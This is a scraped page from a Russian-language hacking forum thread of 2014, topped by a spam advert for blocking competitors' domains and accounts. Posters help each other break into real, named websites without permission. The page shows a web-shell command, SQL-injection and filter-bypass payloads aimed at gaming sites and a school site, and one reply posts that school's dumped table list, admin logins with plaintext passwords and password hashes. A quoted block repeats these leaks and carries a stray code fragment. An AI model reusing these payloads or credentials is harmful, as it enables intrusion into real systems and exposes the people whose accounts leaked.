УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2326 из 2438

2326

Опции темы

Поиск в этой теме

Опции просмотра

#23251

28.01.2014, 19:23

andrxx

Guest

Сообщений: n/a

Провел на форуме:
2764

Репутация: 0

Цитата:

Сообщение от Cherep

Cherep said:
Вопрос все еще интересен, совет юзера выше не помог
выдает при таком коде вот что:

Код:

Code:
Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1

значит шелл залит успешно.. попробуй: wso2.php?cmd=ls, в ответ получишь список файлов

#23252

30.01.2014, 22:03

Unknown

Guest

Сообщений: n/a

Провел на форуме:
114076

Репутация: 54

Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.

Код:

Code:
http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1

Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен.

Код:

Code:
http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271

Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.

Код:

Code:
http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php

fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.

Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.

#23253

31.01.2014, 22:06

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Как вывести пароль юзера от бд MSSQL?

#23254

02.02.2014, 14:00

Unknown

Guest

Сообщений: n/a

Провел на форуме:
15642

Репутация: 6

Цитата:

Сообщение от zombak18

zombak18 said:
Как вывести пароль юзера от бд MSSQL?

почитай, будет полезно

/thread30501.html

#23255

03.02.2014, 20:32

Unknown

Guest

Сообщений: n/a

Провел на форуме:
12774

Репутация: 12

зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.

Цитата:

Сообщение от None

http://gs8.ru/articles?m=articles&n=746

#23256

03.02.2014, 21:02

Unknown

Guest

Сообщений: n/a

Провел на форуме:
114076

Репутация: 54

Цитата:

Сообщение от Shade

Shade said:
зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.

Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.

Таблички:

Код:

Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:

Код:

Code:
1                (1)
5                (5)
SV               (Dubikova)
zx12             (megaadmin)
23091975         (admin)
354000           (Director)

Хеши:

Код:

Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.

UPD: и да, там еще где-то валяется fckeditor, возможно бажный.

#23257

03.02.2014, 22:13

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

Цитата:

Сообщение от madhatter

madhatter said:
Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.

Код:

Code:
http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1

Код:

Code:
http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271

Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.

Код:

Code:
http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php

fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.
Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.

Тут похожу уязвиость не в cms а в плагине remository

Это подтверждает

http://games.onet.ua/index.php?option=com_remository&Itemid=32&func=sel ect&id=0

http://games.onet.ua/components/com_remository/language/

Полазил в сорцах - нигде не слова о версии...

Хз вобщем чем тебе помочь...

Вот единственное что нагуглил но тут скорее всего версия посвежее

http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html

#23258

03.02.2014, 22:42

Unknown

Guest

Сообщений: n/a

Провел на форуме:
12774

Репутация: 12

Цитата:

Сообщение от None

Цитата:

Сообщение от madhatter

madhatter said:
Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.
Таблички:

Код:

Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:

Код:

Code:
1                (1)
5                (5)
SV               (Dubikova)
zx12             (megaadmin)
23091975         (admin)
354000           (Director)

Хеши:

Код:

Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.
UPD: и да, там еще где-то валяется fckeditor, возможно бажный.

" if author else f"

Цитата:

Сообщение от madhatter

madhatter said:
Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.
Таблички:

Код:

Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:

Код:

Code:
1                (1)
5                (5)
SV               (Dubikova)
zx12             (megaadmin)
23091975         (admin)
354000           (Director)

Хеши:

Код:

Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.
UPD: и да, там еще где-то валяется fckeditor, возможно бажный.

Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.

#23259

05.02.2014, 09:30

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Shade

Shade said:
Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.

Уязвимый параметр year:

Цитата:

Сообщение от None

/graduate?year=1957'+and+1=2+union+select+version() +--+

5.1.70-log

Далее на пути стоит sweb, обходите путем изменения регистра.

#23260

05.02.2014, 18:14

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Фильтруется from

Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+

Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+

Как можно обойти фильтр ?

Страница 2326 из 2438

2326

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход